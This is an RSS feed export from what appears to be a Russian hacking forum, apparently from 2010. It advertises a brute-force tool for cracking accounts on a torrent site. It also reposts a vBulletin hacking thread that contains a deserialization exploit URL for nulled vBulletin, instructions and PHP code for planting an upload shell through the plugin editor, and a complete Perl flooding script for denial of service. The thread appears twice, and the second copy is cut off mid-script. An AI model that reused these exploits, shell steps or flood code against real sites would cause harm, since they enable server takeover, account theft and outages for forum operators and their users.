<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://hacking.bbon.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>CyberRoot.tk</title>
		<link>http://hacking.bbon.ru/</link>
		<description>CyberRoot.tk</description>
		<language>ru-ru</language>
		<lastBuildDate>Thu, 07 Jan 2010 04:15:52 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Torrents Brute v 0.1 by [De-visible]</title>
			<link>http://hacking.bbon.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;Брутфорс для &lt;a href=&quot;http://torrents.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://torrents.ru/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;способа брута:&lt;/p&gt;
						&lt;p&gt;- Список паролей на один логин.&lt;br /&gt;- Список логинов на один пароль.&lt;/p&gt;
						&lt;p&gt;В архиве 4 файла:&lt;/p&gt;
						&lt;p&gt;1) passwords.txt&lt;br /&gt;2) Good.txt&lt;br /&gt;3) Bad.txt&lt;br /&gt;4) [De-V] Brute.exe&lt;/p&gt;
						&lt;p&gt;Источник: secnull.INFO&lt;br /&gt;&lt;a href=&quot;http://secnull.ru/64/Torrents_De-V_Brute_secnull.org.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;br /&gt;автор: [De-visible]&lt;/p&gt;</description>
			<author>mybb@mybb.ru (DIRK)</author>
			<pubDate>Thu, 07 Jan 2010 04:15:52 +0300</pubDate>
			<guid>http://hacking.bbon.ru/viewtopic.php?pid=2#p2</guid>
		</item>
		<item>
			<title>Уязвимости vBulletin</title>
			<link>http://hacking.bbon.ru/viewtopic.php?pid=1#p1</link>
			<description>&lt;p&gt;много возникает подобных тем , поэтому предлагаю создать один топ по Булке , куда публиковать все актуальные баги, взломы, сплойты, способы заливки шеллов и другую полезныю информацию по взлому Булки&lt;/p&gt;
						&lt;p&gt;к модерам просьба топ закрепить&lt;/p&gt;
						&lt;p&gt;Как узнать версию VBulletin?&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_ajax_threadslist.js&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_editor.css&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_ajax_namesugg.js&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_attachment.js&lt;br /&gt;В исходниках увидите версию форума&lt;/p&gt;
						&lt;p&gt;VBulletin nulled &amp;lt;= 3.8.1 Arbitrary Function Execution&lt;br /&gt;В нуленных версиях COOKIE_SALT равен пустой строке, это дает возможность манипулировать данными, которые попадают в unserialize(). Для выполнения произвольных функций необходимо передать в параметре postvars сериализованный объект класса vB_Shutdown, где в свойстве shutdown можно перечислять любые функции для выполнения&lt;/p&gt;
						&lt;p&gt;Эксплоит для выполнения phpinfo():&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;/forumdisplay.php?f=2&amp;amp;do=doenterpwd&amp;amp;newforumpwd&amp;amp;postvars=6889b08fded154a6c1dae5987bc28aaaad754a2aO  :11:&amp;quot;vB_Shutdown&amp;quot;:1:{s:8:&amp;quot;shutdown&amp;quot;;a:1:{i:0;s:7:&amp;quot;phpinfo&amp;quot;;}}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Способ заливки шелл на vBulletin всех версий&lt;br /&gt;Плагины и Продукты -&amp;gt; Добавить новый плагин -&amp;gt; в &amp;quot;Plugin PHP Code&amp;quot; написать такое:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 18em&quot;&gt;&lt;pre&gt;$target_path = &amp;quot;images/avatars&amp;quot;; //ваша директория, главное что бы чмод 777 стоял

$target_path = $target_path . basename( $_FILES[&#039;uploadedfile&#039;][&#039;name&#039;]);

if(move_uploaded_file($_FILES[&#039;uploadedfile&#039;][&#039;tmp_name&#039;], $target_path)) {
   echo &amp;quot;The file &amp;quot;.  basename( $_FILES[&#039;uploadedfile&#039;][&#039;name&#039;]).
   &amp;quot; has been uploaded&amp;quot;;
} else{
   echo &amp;quot;There was an error uploading the file&amp;quot;;
}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Устанавливаем плагин как активный, сохраняемся, и видим ошибку &amp;quot;No input File Specified&amp;quot;. Все нормально.&lt;/p&gt;
						&lt;p&gt;Далее нам нужно место для загрузки:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 13.5em&quot;&gt;&lt;pre&gt;&amp;lt;form enctype=&amp;quot;multipart/form-data&amp;quot; action=&amp;quot;ajax.php&amp;quot; method=&amp;quot;POST&amp;quot;&amp;gt;
&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;MAX_FILE_SIZE&amp;quot; value=&amp;quot;100000&amp;quot; /&amp;gt;
Choose a file to upload: &amp;lt;input name=&amp;quot;uploadedfile&amp;quot; type=&amp;quot;file&amp;quot; /&amp;gt;&amp;lt;br /&amp;gt;
&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;s&amp;quot; value=&amp;quot;$session[sessionhash]&amp;quot; /&amp;gt;
&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;securitytoken&amp;quot; value=&amp;quot;$bbuserinfo[securitytoken]&amp;quot; /&amp;gt;
&amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Upload File&amp;quot; /&amp;gt;
&amp;lt;/form&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Вставляем везде где разрешен хтмл, или редактируем шаблон и загружаем наш шелл&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;vBulletin® Version 3.8.2 Denial of Service Exploit&lt;/strong&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;#!usr/bin/perl
#vBulletin® Version 3.8.2 Denial of Service Exploit
#ea$y Laster
##################################################  ######################
# Modules                                                              #
##################################################  ######################
use IO::SOCKET;           # Object interface                           #
##################################################  ######################
if (@ARGV&amp;lt;1){
print&amp;quot;
##################################################  ######################
## _                     _     _                   _                  ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
##|  _| -_| .&#039;|     |___| |   |  _| -_|  _|   | -_|  _|               ##
##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
##                                                                    ##
##################################################  ######################
##################################################  ######################
##                                ##                                  ##
##-&amp;gt;vBulletin® Version 3.8.2&amp;lt;-    ##                                  ##
##                                ##                                  ##
##Gebe diese Daten an             ##                                  ##
##1.Ziel                          ##[*] www.Ziel.com                  ##
##2.Board                         ##[*] vbulletin                     ##
##3.Verwundbarkeit                ##[*] forumdisplay.php?f=           ##
##4.Zeit des vorganges            ##[*] 9999999999999999              ##
##5.Port                          ##[*] 80                            ##
##################################################  ######################
\a&amp;quot;;}
$block = &amp;quot;
##################################################  ######################&amp;quot;;
$fehler = &amp;quot;Fehler!Fehler!Fehler!Fehler&amp;quot;;
$x =0;
    print&amp;quot;$block\n&amp;quot;;
    print q(Ziel-&amp;gt;);
    chomp($ziel =&amp;lt;STDIN&amp;gt;);
    if ($ziel eq&amp;quot;&amp;quot;){
    die &amp;quot;$fehler\a\n&amp;quot;;}
    print&amp;quot;$block\n&amp;quot;;
      print&amp;quot;$block\n&amp;quot;;
      print q(Path-&amp;gt;);
      chomp($path =&amp;lt;STDIN&amp;gt;);
      if ($path eq &amp;quot;&amp;quot;) {
      die &amp;quot;$fehler !\a\n&amp;quot;;}
      print&amp;quot;$block\n&amp;quot;;
         print&amp;quot;$block\n&amp;quot;;
         print &amp;quot;Verwundbarkeit\n&amp;quot;;
         print&amp;quot;forumdisplay.php?f=\n&amp;quot;;
         print&amp;quot;-&amp;gt;&amp;quot;n;
           chomp($vul =&amp;lt;STDIN&amp;gt;);
           if ($vul eq &amp;quot;&amp;quot;) {
           die &amp;quot;$fehler !\a\n&amp;quot;;}
           print&amp;quot;$block\n&amp;quot;;
              print&amp;quot;$block\n&amp;quot;;
              print q(Time-&amp;gt;);
              chomp($flood =&amp;lt;STDIN&amp;gt;);
              if ($flood eq &amp;quot;&amp;quot;) {
              die &amp;quot;$fehler !\a\n&amp;quot;;}
                 print&amp;quot;$block\n&amp;quot;;
                 print&amp;quot;$block\n&amp;quot;;
                 print q(Port-&amp;gt;);
                 chomp($port =&amp;lt;STDIN&amp;gt;);
                 if ($port eq &amp;quot;&amp;quot;){
                 die &amp;quot;$fehler \n&amp;quot;;}
                 print&amp;quot;$block\n&amp;quot;;
                    print q(Send &amp;quot;start&amp;quot;-&amp;gt;);
                    chomp($start =&amp;lt;STDIN&amp;gt;);
                    if ($start eq &amp;quot;&amp;quot;) {
                    die &amp;quot;$fehler\n&amp;quot;;}
print &amp;quot;$block\a\n&amp;quot;;
print &amp;quot;[+]Konntroliere Daten \n&amp;quot;;
print &amp;quot;[*]Kontroliere Ziel   : $ziel\n&amp;quot;;
print &amp;quot;[*]Kontroliere Board  : $path\n&amp;quot;;
print &amp;quot;[*]Kontroliere Port   : $port\n&amp;quot;;
print &amp;quot;$block\n&amp;quot;;
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = &amp;quot;$ziel&amp;quot;.&amp;quot;$path&amp;quot;.&amp;quot;$vul&amp;quot;;
$lrg = length $postit;
$sock = new IO::Socket::INET (
                              PeerAddr =&amp;gt; &amp;quot;$ziel&amp;quot;,
                              PeerPort =&amp;gt; &amp;quot;$port&amp;quot;,
                              Proto =&amp;gt; &amp;quot;tcp&amp;quot;,
                             );

print $sock &amp;quot;POST $path$vul HTTP/1.1\n&amp;quot;;
print $sock &amp;quot;Host: $ziel\n&amp;quot;;
print $sock &amp;quot;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n&amp;quot;;
print $sock &amp;quot;Referer: $ziel\n&amp;quot;;
print $sock &amp;quot;Accept-Language: en-us\n&amp;quot;;
print $sock &amp;quot;Content-Type: application/x-www-form-urlencoded\n&amp;quot;;
print $sock &amp;quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n&amp;quot;;
print $sock &amp;quot;Content-Length: $lrg\n\n&amp;quot;;
print $sock &amp;quot;$postit\n&amp;quot;;
close($sock);
syswrite STDOUT, &amp;quot;-&amp;gt;BLACKOUT&amp;lt;-&amp;quot;;
$x++;
}
}else{
die &amp;quot;Fehler kann nicht zum Ziel verbinden $ziel !\n&amp;quot;;
}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;много возникает подобных тем , поэтому предлагаю создать один топ по Булке , куда публиковать все актуальные баги, взломы, сплойты, способы заливки шеллов и другую полезныю информацию по взлому Булки&lt;/p&gt;
						&lt;p&gt;к модерам просьба топ закрепить&lt;/p&gt;
						&lt;p&gt;Как узнать версию VBulletin?&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_ajax_threadslist.js&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_editor.css&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_ajax_namesugg.js&lt;br /&gt;wwwforum.сom/forumpath/clientscript/vbulletin_attachment.js&lt;br /&gt;В исходниках увидите версию форума&lt;/p&gt;
						&lt;p&gt;VBulletin nulled &amp;lt;= 3.8.1 Arbitrary Function Execution&lt;br /&gt;В нуленных версиях COOKIE_SALT равен пустой строке, это дает возможность манипулировать данными, которые попадают в unserialize(). Для выполнения произвольных функций необходимо передать в параметре postvars сериализованный объект класса vB_Shutdown, где в свойстве shutdown можно перечислять любые функции для выполнения&lt;/p&gt;
						&lt;p&gt;Эксплоит для выполнения phpinfo():&lt;br /&gt;Код|Code&lt;br /&gt;/forumdisplay.php?f=2&amp;amp;do=doenterpwd&amp;amp;newforumpwd&amp;amp;postvars=6889b08fded154a6c1dae5987bc28aaaad754a2aO&amp;#160; :11:&amp;quot;vB_Shutdown&amp;quot;:1:{s:8:&amp;quot;shutdown&amp;quot;;a:1:{i:0;s:7:&amp;quot;phpinfo&amp;quot;;}}&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Способ заливки шелл на vBulletin всех версий&lt;br /&gt;Плагины и Продукты -&amp;gt; Добавить новый плагин -&amp;gt; в &amp;quot;Plugin PHP Code&amp;quot; написать такое:&lt;br /&gt;Код|Code&lt;br /&gt;$target_path = &amp;quot;images/avatars&amp;quot;; //ваша директория, главное что бы чмод 777 стоял&lt;/p&gt;
						&lt;p&gt;$target_path = $target_path . basename( $_FILES[&#039;uploadedfile&#039;][&#039;name&#039;]);&lt;/p&gt;
						&lt;p&gt;if(move_uploaded_file($_FILES[&#039;uploadedfile&#039;][&#039;tmp_name&#039;], $target_path)) {&lt;br /&gt;&amp;#160; &amp;#160;echo &amp;quot;The file &amp;quot;.&amp;#160; basename( $_FILES[&#039;uploadedfile&#039;][&#039;name&#039;]).&lt;br /&gt;&amp;#160; &amp;#160;&amp;quot; has been uploaded&amp;quot;;&lt;br /&gt;} else{&lt;br /&gt;&amp;#160; &amp;#160;echo &amp;quot;There was an error uploading the file&amp;quot;;&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Устанавливаем плагин как активный, сохраняемся, и видим ошибку &amp;quot;No input File Specified&amp;quot;. Все нормально.&lt;/p&gt;
						&lt;p&gt;Далее нам нужно место для загрузки:&lt;br /&gt;Код|Code&lt;br /&gt;&amp;lt;form enctype=&amp;quot;multipart/form-data&amp;quot; action=&amp;quot;ajax.php&amp;quot; method=&amp;quot;POST&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;MAX_FILE_SIZE&amp;quot; value=&amp;quot;100000&amp;quot; /&amp;gt;&lt;br /&gt;Choose a file to upload: &amp;lt;input name=&amp;quot;uploadedfile&amp;quot; type=&amp;quot;file&amp;quot; /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;s&amp;quot; value=&amp;quot;$session[sessionhash]&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;securitytoken&amp;quot; value=&amp;quot;$bbuserinfo[securitytoken]&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Upload File&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;/p&gt;
						&lt;p&gt;Вставляем везде где разрешен хтмл, или редактируем шаблон и загружаем наш шелл smile.gif&lt;/p&gt;
						&lt;p&gt;vBulletin® Version 3.8.2 Denial of Service Exploit&lt;br /&gt;Код|Code&lt;br /&gt;#!usr/bin/perl&lt;br /&gt;#vBulletin® Version 3.8.2 Denial of Service Exploit&lt;br /&gt;#ea$y Laster&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;# Modules&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; #&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;use IO::SOCKET;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;# Object interface&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;#&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;if (@ARGV&amp;lt;1){&lt;br /&gt;print&amp;quot;&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;## _&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;_&amp;#160; &amp;#160; &amp;#160;_&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;_&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##|&amp;#160; _| -_| .&#039;|&amp;#160; &amp;#160; &amp;#160;|___| |&amp;#160; &amp;#160;|&amp;#160; _| -_|&amp;#160; _|&amp;#160; &amp;#160;| -_|&amp;#160; _|&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;##&lt;br /&gt;##|_| |___|__,|_|_|_|&amp;#160; &amp;#160;|_|_|_|_| |___|_| |_|_|___|_|&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;##&lt;br /&gt;##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##-&amp;gt;vBulletin® Version 3.8.2&amp;lt;-&amp;#160; &amp;#160; ##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##Gebe diese Daten an&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;##&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##1.Ziel&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##[*] wwwZiel.com&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##2.Board&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;##[*] vbulletin&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;##&lt;br /&gt;##3.Verwundbarkeit&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##[*] forumdisplay.php?f=&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;##&lt;br /&gt;##4.Zeit des vorganges&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##[*] 9999999999999999&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##5.Port&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##[*] 80&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ##&lt;br /&gt;##################################################&amp;#160; ######################&lt;br /&gt;\a&amp;quot;;}&lt;br /&gt;$block = &amp;quot;&lt;br /&gt;##################################################&amp;#160; ######################&amp;quot;;&lt;br /&gt;$fehler = &amp;quot;Fehler!Fehler!Fehler!Fehler&amp;quot;;&lt;br /&gt;$x =0;&lt;br /&gt;&amp;#160; &amp;#160; print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; print q(Ziel-&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; chomp($ziel =&amp;lt;STDIN&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; if ($ziel eq&amp;quot;&amp;quot;){&lt;br /&gt;&amp;#160; &amp;#160; die &amp;quot;$fehler\a\n&amp;quot;;}&lt;br /&gt;&amp;#160; &amp;#160; print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; print q(Path-&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; chomp($path =&amp;lt;STDIN&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; if ($path eq &amp;quot;&amp;quot;) {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; die &amp;quot;$fehler !\a\n&amp;quot;;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print &amp;quot;Verwundbarkeit\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;forumdisplay.php?f=\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;-&amp;gt;&amp;quot;n;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;chomp($vul =&amp;lt;STDIN&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;if ($vul eq &amp;quot;&amp;quot;) {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;die &amp;quot;$fehler !\a\n&amp;quot;;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; print q(Time-&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; chomp($flood =&amp;lt;STDIN&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; if ($flood eq &amp;quot;&amp;quot;) {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; die &amp;quot;$fehler !\a\n&amp;quot;;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print q(Port-&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;chomp($port =&amp;lt;STDIN&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;if ($port eq &amp;quot;&amp;quot;){&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;die &amp;quot;$fehler \n&amp;quot;;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;print&amp;quot;$block\n&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; print q(Send &amp;quot;start&amp;quot;-&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; chomp($start =&amp;lt;STDIN&amp;gt;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; if ($start eq &amp;quot;&amp;quot;) {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; die &amp;quot;$fehler\n&amp;quot;;}&lt;br /&gt;print &amp;quot;$block\a\n&amp;quot;;&lt;br /&gt;print &amp;quot;[+]Konntroliere Daten \n&amp;quot;;&lt;br /&gt;print &amp;quot;[*]Kontroliere Ziel&amp;#160; &amp;#160;: $ziel\n&amp;quot;;&lt;br /&gt;print &amp;quot;[*]Kontroliere Board&amp;#160; : $path\n&amp;quot;;&lt;br /&gt;print &amp;quot;[*]Kontroliere Port&amp;#160; &amp;#160;: $port\n&amp;quot;;&lt;br /&gt;print &amp;quot;$block\n&amp;quot;;&lt;br /&gt;if($start == 1){&lt;br /&gt;while($x != 0000){&lt;br /&gt;$x++;}&lt;br /&gt;}elsif ($start == start){&lt;br /&gt;while($x != $flood)&lt;br /&gt;{&lt;br /&gt;$postit = &amp;quot;$ziel&amp;quot;.&amp;quot;$path&amp;quot;.&amp;quot;$vul&amp;quot;;&lt;br /&gt;$lrg = length $postit;&lt;br /&gt;$sock = new IO::Socket::INET (&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; PeerAddr =&amp;gt; &amp;quot;$ziel&amp;quot;,&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; PeerPort =&amp;gt; &amp;quot;$port&amp;quot;,&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Proto =&amp;gt; &amp;quot;tcp&amp;quot;,&lt;br 